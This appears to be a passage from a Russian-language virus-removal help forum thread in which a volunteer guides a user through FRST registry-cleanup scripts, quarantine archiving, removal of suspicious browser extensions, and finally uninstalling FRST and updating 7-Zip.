ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
DeleteKey: HKLM-32\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\violent-thief_is1
DeleteKey: HKLM-32\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Driver Booster_is1)
Reboot:
End::

Запустите FRST.EXE/FRST64.EXE, нажмите один раз Исправить и подождите. Вставлять код никуда не нужно, программа возьмёт его из буфера обмена. Будет создан лог-файл (Fixlog.txt), прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен.

Папку C:\FRST\Quarantine упакуйте с максимальным сжатием в непрерывный архив с паролем.
Вложение 690344
Результат выложите в облако или на файлообменник и дайте ссылку и пароль в личном сообщении.

Удалите расширения Xfinder.pro и Torrent Scanner в MS Edge , в Yandex браузере - Torrent Scanner, Find-it.Pro Search и T-Сashback — кэшбэк-сервис, последний - если не пользуетесь.

**Kustik1626** · 05.06.2025, 18:59

Возникла проблема, винрар отказывает в доступе при сжатии

**Vvvyg** · 05.06.2025, 21:30

Сделайте такое исправление в FRST в обычном режиме, перезагрузки не будет:

Код:

Start::
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\violent-thief_is1
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Driver Booster_is1)
Unlock: C:\FRST\Quarantine
CreateRestorePoint:
End:

Новый Fixlog.txt прикрепите.

Потом пробуйте упаковать карантин.

**Kustik1626** · 08.06.2025, 17:50

Карантин не потдаётся

**Vvvyg** · 08.06.2025, 19:27

Тогда закончим на этом.

Переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите. Логи, карантин и другие файлы, созданные программой, будут удалены.
Компьютер перезагрузится.

Обновите 7-Zip: Обнаружена уязвимость в 7-Zip, которую могут использовать в атаках на пользователей архиватора.

Подозрение на вирус (заявка № 229701)

Опции темы